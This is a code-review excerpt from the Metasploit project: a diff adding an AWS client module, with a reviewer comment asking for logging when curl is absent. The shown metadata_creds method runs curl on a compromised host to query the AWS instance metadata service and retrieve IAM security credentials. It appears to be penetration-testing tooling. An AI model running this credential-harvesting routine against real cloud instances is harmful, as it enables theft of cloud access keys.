lib/metasploit/framework/aws/client.rb

```diff
@@ -0,0 +1,179 @@
+require 'openssl'
+
+module Metasploit
+  module Framework
+    module Aws
+      module Client
+        include Msf::Exploit::Remote::HttpClient
+        def register_autofilter_ports(ports=[]); end
+        def register_autofilter_hosts(ports=[]); end
+        def register_autofilter_services(services=[]); end
+
+        def metadata_creds
+          # TODO: do it for windows/generic way
+          cmd_out = cmd_exec("curl --version")
+          if cmd_out =~ /^curl \d/
+            url = "http://#{datastore['METADATA_IP']}/2012-01-12/meta-data/"
+            print_status("#{datastore['METADATA_IP']} - looking for creds...")
+            resp = cmd_exec("curl #{url}")
+            if resp =~ /^iam.*/
+              resp = cmd_exec("curl #{url}iam/")
+              if resp =~ /^security-credentials.*/
+                resp = cmd_exec("curl #{url}iam/security-credentials/")
+                return JSON.parse(cmd_exec("curl #{url}iam/security-credentials/#{resp}"))
+              end
+            end
+          else
+            print_error cmd_out
+          end
+          {}
```

Comment:
Probably got lost when turning this into two PRs, but you should log here when curl isn't installed/etc.